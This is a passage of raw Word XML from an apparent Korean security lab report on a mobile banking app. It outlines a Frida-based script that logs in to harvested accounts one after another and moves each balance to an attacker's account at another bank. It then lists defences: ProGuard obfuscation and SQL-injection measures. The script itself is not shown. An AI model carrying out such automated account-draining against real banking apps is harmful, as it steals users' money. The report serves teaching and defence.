      <w:r w:rsidR="00D95D14" w:rsidRPr="00176F06">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 자동화 스크립트 작성</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA2F96" w:rsidRPr="00C223A0" w:rsidRDefault="008F4570" w:rsidP="006B7B8F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color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr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위에서 얻은 정보를 </w:t>
      </w:r>
      <w:r w:rsidR="00B47319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유저 리스트(</w:t>
      </w:r>
      <w:r w:rsidR="00B47319" w:rsidRPr="00C223A0">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>user_list)</w:t>
      </w:r>
      <w:r w:rsidR="006B7B8F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에</w:t>
      </w:r>
      <w:r w:rsidR="00C223A0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 </w:t>
      </w:r>
      <w:r w:rsidR="006B7B8F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입력</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA2F96" w:rsidRPr="00C223A0" w:rsidRDefault="007029B9" w:rsidP="006B7B8F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color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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819E7A" wp14:editId="12A95609">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1663881</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>345259</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3701143" cy="179614"/>
                <wp:effectExtent l="0" t="0" r="13970" b="1143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3" cy="179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7854" id="직사각형 46" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:131pt;margin-top:27.2pt;width:291.4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" filled="f" strokecolor="red" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00C223A0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565517" wp14:editId="5C0B0136">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2240824</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1014730</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="419100" cy="146957"/>
                <wp:effectExtent l="0" t="0" r="19050" b="2476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FAE7" id="직사각형 47" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:176.45pt;margin-top:79.9pt;width:33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" filled="f" strokecolor="red" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00B47319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계좌</w:t>
      </w:r>
      <w:r w:rsidR="006B7B8F" w:rsidRPr="00C223A0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3A54C0" wp14:editId="31D22550">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>320502</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4680000" cy="892800"/>
            <wp:effectExtent l="0" t="0" r="0" b="317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319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 수집</w:t>
      </w:r>
      <w:r w:rsidR="00B47319" w:rsidRPr="00C223A0">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(c</w:t>
      </w:r>
      <w:r w:rsidR="006B7B8F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ollection_account</w:t>
      </w:r>
      <w:r w:rsidR="00B47319" w:rsidRPr="00C223A0">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="006B7B8F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에 공격자 계좌 입력</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA2F96" w:rsidRDefault="002A2F1E" w:rsidP="007B0553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bookmarkStart w:id="23" w:name="_heading=h.4f1mdlm" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="23"/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157B80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BF0260">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>38</w:t>
      </w:r>
      <w:r w:rsidR="00B47319">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>]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</w:t>
      </w:r>
      <w:r w:rsidR="007D7D6F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이체 </w:t>
      </w:r>
      <w:r w:rsidR="007B0553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자동화 코드</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B7B8F" w:rsidRDefault="006B7B8F">
      <w:pPr>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:snapToGrid/>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_heading=h.19c6y18" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w:rsidR="00EA2F96" w:rsidRPr="006B7B8F" w:rsidRDefault="007D7D6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176F06">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>프리다를 이용해</w:t>
      </w:r>
      <w:r w:rsidR="006B7B8F" w:rsidRPr="00176F06">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 이체 </w:t>
      </w:r>
      <w:r w:rsidR="00F339B9" w:rsidRPr="00176F06">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">자동화 </w:t>
      </w:r>
      <w:r w:rsidR="006B7B8F" w:rsidRPr="00176F06">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>스크립트 실행</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA2F96" w:rsidRPr="00C223A0" w:rsidRDefault="00F72C1E" w:rsidP="00F72C1E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color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C223A0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5EE468D" wp14:editId="01157CEC">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>304684</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4680000" cy="680400"/>
            <wp:effectExtent l="0" t="0" r="6350" b="5715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로그인을 클릭할 때마다 계정이 바뀌면서 </w:t>
      </w:r>
      <w:r w:rsidR="007D7D6F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타행(</w:t>
      </w:r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래빗뱅크</w:t>
      </w:r>
      <w:r w:rsidR="007D7D6F"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>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C223A0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 잔액을 모두 탈취</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="25" w:name="_heading=h.3tbugp1" w:colFirst="0" w:colLast="0"/>
    <w:bookmarkEnd w:id="25"/>
    <w:p w:rsidR="00EA2F96" w:rsidRPr="004C2629" w:rsidRDefault="004C2629" w:rsidP="004C2629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FA6AC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0" wp14:anchorId="30661A37" wp14:editId="58087776">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>697230</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1158875</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4680000" cy="2134800"/>
                <wp:effectExtent l="19050" t="19050" r="25400" b="18415"/>
                <wp:wrapTopAndBottom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2134800"/>
                          <a:chOff x="473768" y="-156952"/>
                          <a:chExt cx="5016827" cy="2314433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473768" y="-156952"/>
                            <a:ext cx="5016827" cy="2314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타원형 설명선 12"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2174558" y="218661"/>
                            <a:ext cx="1967230" cy="1662430"/>
                          </a:xfrm>
                          <a:prstGeom prst="wedgeEllipseCallout">
                            <a:avLst>
                              <a:gd name="adj1" fmla="val -87762"/>
                              <a:gd name="adj2" fmla="val -5338"/>
                            </a:avLst>
                          </a:prstGeom>
                          <a:blipFill dpi="0" rotWithShape="1"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E6F" w:rsidRDefault="00610E6F" w:rsidP="00F72C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61A37" id="그룹 13" o:spid="_x0000_s1054" style="position:absolute;left:0;text-align:left;margin-left:54.9pt;margin-top:91.25pt;width:368.5pt;height:168.1pt;z-index:251664384;mso-width-relative:margin;mso-height-relative:margin" coordorigin="4737,-1569" coordsize="50168,2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" o:allowoverlap="f">
                <v:shape id="그림 17" o:spid="_x0000_s1055" type="#_x0000_t75" style="position:absolute;left:4737;top:-1569;width:50168;height:2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" stroked="t" strokecolor="black [3213]">
                  <v:imagedata r:id="rId60" o:title="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타원형 설명선 12" o:spid="_x0000_s1056" type="#_x0000_t63" style="position:absolute;left:21745;top:2186;width:19672;height:16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" adj="-8157,9647" strokecolor="white [3212]" strokeweight="1pt">
                  <v:fill r:id="rId61" o:title="" recolor="t" rotate="t" type="frame"/>
                  <v:textbox>
                    <w:txbxContent>
                      <w:p w:rsidR="00610E6F" w:rsidRDefault="00610E6F" w:rsidP="00F72C1E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2F1E"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29318C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BF0260">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>39</w:t>
      </w:r>
      <w:r w:rsidR="007D7D6F">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="002A2F1E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</w:t>
      </w:r>
      <w:r w:rsidR="007B0553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프리다 </w:t>
      </w:r>
      <w:r w:rsidR="007D7D6F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이체 자동화 스크립트 </w:t>
      </w:r>
      <w:r w:rsidR="007B0553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실행</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA2F96" w:rsidRDefault="004C2629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bookmarkStart w:id="26" w:name="_heading=h.28h4qwu" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="26"/>
      <w:r w:rsidRPr="00FA6AC1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251666432" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="57DBDA25" wp14:editId="284CB1BB">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2614930</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4680000" cy="752400"/>
            <wp:effectExtent l="19050" t="19050" r="6350" b="1016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037" b="49609"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4680000" cy="75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F1E"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6C1BB5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BF0260">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>40</w:t>
      </w:r>
      <w:r w:rsidR="007D7D6F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="007D7D6F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이체</w:t>
      </w:r>
      <w:r w:rsidR="007B0553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확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00103B7B" w:rsidRDefault="00660F0A" w:rsidP="00660F0A">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2738"/>
        </w:tabs>
        <w:ind w:left="56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[그림</w:t>
      </w:r>
      <w:r w:rsidR="0029318C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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DB3E07">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:bookmarkStart w:id="27" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="27"/>
      <w:r w:rsidR="00BF0260">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="007D7D6F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] </w:t>
      </w:r>
      <w:r w:rsidR="007B0553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공격자 계좌 확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00103B7B" w:rsidRDefault="00103B7B">
      <w:pPr>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:snapToGrid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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C2629" w:rsidRPr="00223B00" w:rsidRDefault="00103B7B" w:rsidP="007F3827">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc173402913"/>
      <w:r w:rsidRPr="00223B00">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>대응방안</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w:rsidR="004C2629" w:rsidRPr="00223B00" w:rsidRDefault="004C2629" w:rsidP="007F3827">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc173402914"/>
      <w:r w:rsidRPr="00223B00">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>코드 난독화</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w:rsidR="00FA20AC" w:rsidRDefault="00DA3488" w:rsidP="00DA348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426"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(1)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A54C32" w:rsidRPr="00A54C32">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>코드 난독화 적용</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D1255" w:rsidRDefault="00FA20AC" w:rsidP="001D1255">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:before="120"/>
        <w:ind w:left="5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0845CB" wp14:editId="5F6A401B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4613910</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2398032</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="740229" cy="968829"/>
                <wp:effectExtent l="57150" t="19050" r="60325" b="41275"/>
                <wp:wrapNone/>
                <wp:docPr id="24" name="아래쪽 화살표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968829"/>
                        </a:xfrm>
                        <a:prstGeom prst="downArrow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927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4" o:spid="_x0000_s1026" type="#_x0000_t67" style="position:absolute;left:0;text-align:left;margin-left:363.3pt;margin-top:188.8pt;width:58.3pt;height:76.3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" adj="13348" fillcolor="white [3201]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A0D2015" wp14:editId="7494B532">
            <wp:extent cx="5040000" cy="2547549"/>
            <wp:effectExtent l="19050" t="19050" r="27305" b="2476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7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255" w:rsidRPr="001D1255" w:rsidRDefault="001D1255" w:rsidP="001D1255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sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D1255">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">그림 </w:t>
      </w:r>
      <w:r w:rsidR="00BF0260">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>42</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>난독화 전 코드</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D1255" w:rsidRDefault="00FA20AC" w:rsidP="001D1255">
      <w:pPr>
        <w:pStyle w:val="a8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/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A4D13C2" wp14:editId="59FBD44A">
            <wp:extent cx="5040000" cy="2500527"/>
            <wp:effectExtent l="19050" t="19050" r="27305" b="146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0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255" w:rsidRDefault="001D1255" w:rsidP="001D125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</w:pPr>
      <w:r w:rsidRPr="001D1255">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">[그림 </w:t>
      </w:r>
      <w:r w:rsidR="00BF0260">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>43</w:t>
      </w:r>
      <w:r w:rsidRPr="001D1255">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>] ProGuard</w:t>
      </w:r>
      <w:r w:rsidRPr="001D1255">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>을 통한 난독화 후 코드</w:t>
      </w:r>
      <w:r w:rsidR="00FA20AC">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A82FB4" w:rsidRPr="00A54C32" w:rsidRDefault="001D1255" w:rsidP="001D1255">
      <w:pPr>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:snapToGrid/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A82FB4" w:rsidRPr="00223B00" w:rsidRDefault="00103B7B" w:rsidP="007F3827">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc173402915"/>
      <w:r w:rsidRPr="00223B00">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00223B00">
        <w:t>QL</w:t>
      </w:r>
      <w:r w:rsidRPr="00223B00">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>인젝션</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w:rsidR="00A82FB4" w:rsidRDefault="00A82FB4" w:rsidP="00A82FB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/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00A82FB4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">(1) </w:t>
      </w:r>
      <w:r w:rsidRPr="00A82FB4">
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:r w:rsidRPr="00A82FB4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>쿼리</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>문을 사용자 입력이 아닌 매개변수를 이용해 전송</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A82FB4" w:rsidRDefault="00A82FB4" w:rsidP="00A82FB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/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">(2) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>입력이 예상되는 형식,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>유형 및 길이를 확인하고 예민한 문자열을 감지</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A82FB4" w:rsidRDefault="00A82FB4" w:rsidP="00A82FB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/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(3) ORM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af0"/>
        </w:rPr>
        <w:footnoteReference w:id="1"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(객체 관계형 매칭)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>라이브러리 사용</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A82FB4" w:rsidRDefault="00A82FB4" w:rsidP="00A82FB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/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(4) 어플리케이션 방화벽 사용</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000777E6" w:rsidRDefault="00A82FB4" w:rsidP="00A82FB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/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(5) 정기적인 보안 검사 및 침투 테스트 진행</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A82FB4" w:rsidRPr="00A82FB4" w:rsidRDefault="000777E6" w:rsidP="00AE33C8">
      <w:pPr>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:snapToGrid/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B0EA7" w:rsidRPr="00223B00" w:rsidRDefault="003B0EA7" w:rsidP="007F3827">
      <w:pPr>
        <w:pStyle w:val="20"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc173402916"/>
      <w:r w:rsidRPr="00223B00">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>총평</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w:rsidR="005B3458" w:rsidRDefault="007E3A38" w:rsidP="006041C6">
      <w:pPr>
        <w:pStyle w:val="a8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60"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>개인적으로 2차인증 등 보안을</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>준수하여 사용하더라도,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>사용하고있는 앱이 취약하다면 공격자가</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006041C6" w:rsidRDefault="007E3A38" w:rsidP="006041C6">
      <w:pPr>
        <w:pStyle w:val="a8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60"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>앱을 이용해 개인정보 및 금전을 탈취할 수 있다.</w:t>
      </w:r>
      <w:r w:rsidR="006041C6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006041C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이를 방지하기 위해 코드난독화를 적용해야한다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B3458" w:rsidRDefault="006041C6" w:rsidP="001639E3">
      <w:pPr>
        <w:pStyle w:val="a8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60"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>코드 난독화를 적용하면 공격자가 코드를 이해하고 악용하기 어렵게 만들어 대부분의 취약점을</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E3A38" w:rsidRDefault="006041C6" w:rsidP="001639E3">
      <w:pPr>
        <w:pStyle w:val="a8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60"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>방지하고 보안성을 높일 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A746AF" w:rsidRPr="00985928" w:rsidRDefault="00A746AF" w:rsidP="00A746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</w:pPr>
    </w:p>
    <w:p w:rsidR="000C65BD" w:rsidRPr="000C65BD" w:rsidRDefault="00E1045B" w:rsidP="007F3827">
      <w:pPr>
        <w:pStyle w:val="20"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_heading=h.nmf14n" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="33" w:name="_heading=h.r2r73f" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="34" w:name="_Toc173402917"/>
      <w:bookmarkEnd w:id="32"/>
      <w:bookmarkEnd w:id="33"/>
      <w:r w:rsidRPr="00223B00">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>참고자료</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w:rsidR="00BE5DB8" w:rsidRPr="00BE5DB8" w:rsidRDefault="00BE5DB8" w:rsidP="00BE5DB8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b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE5DB8">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">코드 </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE5DB8">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>난독화</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE5DB8" w:rsidRDefault="00BE5DB8" w:rsidP="00BE5DB8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szCs w:val="20"/>
        </w:rPr>
        <w:t>핀테크서비스 취약점 점검 안내.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pdf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C65BD" w:rsidRPr="001B5FBC" w:rsidRDefault="000C65BD" w:rsidP="000C65BD">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:pBdr>
